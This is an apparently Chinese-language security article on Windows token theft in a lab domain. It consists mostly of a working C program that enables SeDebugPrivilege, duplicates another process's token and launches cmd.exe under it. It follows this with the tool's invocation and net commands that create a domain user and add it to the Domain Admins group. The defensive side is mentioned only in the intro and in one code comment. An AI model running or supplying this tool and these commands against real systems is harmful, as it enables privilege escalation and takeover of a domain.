这篇文章将会对 Windows 令牌窃取及防御技术进行介绍，所使用的环境是上一篇文章中搭建的环境：《搭建一个简单的 Windows 域环境》
#include <windows.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
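int main(int argc, char* argv[]) {
    /*
     * Demo from the article: open the process whose PID is given in argv[1],
     * duplicate its primary token and start cmd.exe under that token.
     *
     * argv[1]  decimal PID of the process whose token is duplicated.
     * Returns 0 on success, 1 on any failure (the Win32 error code is printed).
     *
     * The three steps below (enabling SeDebugPrivilege, opening another
     * process's token, creating a process under a token that is not our own)
     * are exactly the events a monitoring rule for this technique watches for.
     *
     * All variables are declared up front so the goto-based cleanup never
     * jumps over an initialization (keeps the file valid if built as C++).
     */
    int rc = 1;
    HANDLE hToken1 = NULL;    /* our own token, only used to enable SeDebugPrivilege */
    HANDLE hProcess = NULL;   /* target process */
    HANDLE hToken = NULL;     /* target process's token */
    HANDLE NewToken = NULL;   /* duplicated primary token */
    TOKEN_PRIVILEGES tokenPriv = {0};
    STARTUPINFOW startup_info = {0};
    PROCESS_INFORMATION process_info = {0};
    char *end = NULL;
    unsigned long pid_val = 0;
    DWORD pid = 0;

    /* argv[1] was dereferenced unconditionally before; reject a missing PID. */
    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    /* strtoul instead of atoi: empty, non-numeric and out-of-range input are
     * all detectable rather than silently becoming PID 0. */
    errno = 0;
    pid_val = strtoul(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE || pid_val > MAXDWORD) {
        printf("Invalid PID: %s\n", argv[1]);
        return 1;
    }
    pid = (DWORD)pid_val;

    /* Enable SeDebugPrivilege on our own token. Only the access rights the
     * adjustment needs are requested (the original asked for TOKEN_ALL_ACCESS). */
    tokenPriv.PrivilegeCount = 1;
    tokenPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken1) ||
        !LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tokenPriv.Privileges[0].Luid)) {
        printf("Open Process Token Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    /* AdjustTokenPrivileges returns TRUE even when the privilege could not be
     * enabled (for example because the caller does not hold it at all); that
     * case is only reported through GetLastError() == ERROR_NOT_ALL_ASSIGNED,
     * so both conditions are checked. */
    if (!AdjustTokenPrivileges(hToken1, FALSE, &tokenPriv, 0, NULL, NULL) ||
        GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        printf("AdjustTokenPrivileges Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }
    CloseHandle(hToken1);
    hToken1 = NULL;

    /* Open the target process. The handle does not need to be inheritable,
     * so bInheritHandle is FALSE (the original passed TRUE). */
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (!hProcess) {
        printf("Cannot Open Process. Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    /* TOKEN_DUPLICATE is what DuplicateTokenEx requires on the source token. */
    if (!OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) {
        printf("Cannot Open Process Token. Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    /* A primary token at SecurityImpersonation level is what process
     * creation below needs. */
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &NewToken)) {
        printf("Duplicate Token Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    /* cb must be filled in before a STARTUPINFO is handed to a process
     * creation API (the original left it 0), and the W variant of the struct
     * matches the wide-string CreateProcessWithTokenW signature. */
    startup_info.cb = sizeof startup_info;
    if (!CreateProcessWithTokenW(NewToken, 0, L"C:\\Windows\\system32\\cmd.exe", NULL,
                                 CREATE_NEW_CONSOLE, NULL, NULL, &startup_info, &process_info)) {
        printf("Cannot Create Process With Token. Failed with Error Code: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    /* The child runs on its own; drop our handles to it so nothing leaks. */
    CloseHandle(process_info.hThread);
    CloseHandle(process_info.hProcess);
    rc = 0;

cleanup:
    /* CloseHandle(NULL) fails with ERROR_INVALID_HANDLE rather than being a
     * no-op, so only handles that were actually opened are closed. */
    if (NewToken) {
        CloseHandle(NewToken);
    }
    if (hToken) {
        CloseHandle(hToken);
    }
    if (hProcess) {
        CloseHandle(hProcess);
    }
    if (hToken1) {
        CloseHandle(hToken1);
    }
    return rc;
}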
cd C:\Users\admin\Desktop
GetToken.exe 336
// 添加 test 用户，密码是 admin@123
net user test admin@123 /add /domain
// 把 test 用户添加进域管理员组
net group "domain admins" test /add /domain
// 查看域管理员
net group "domain admins"
本文作者:timeshatter
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/131423.html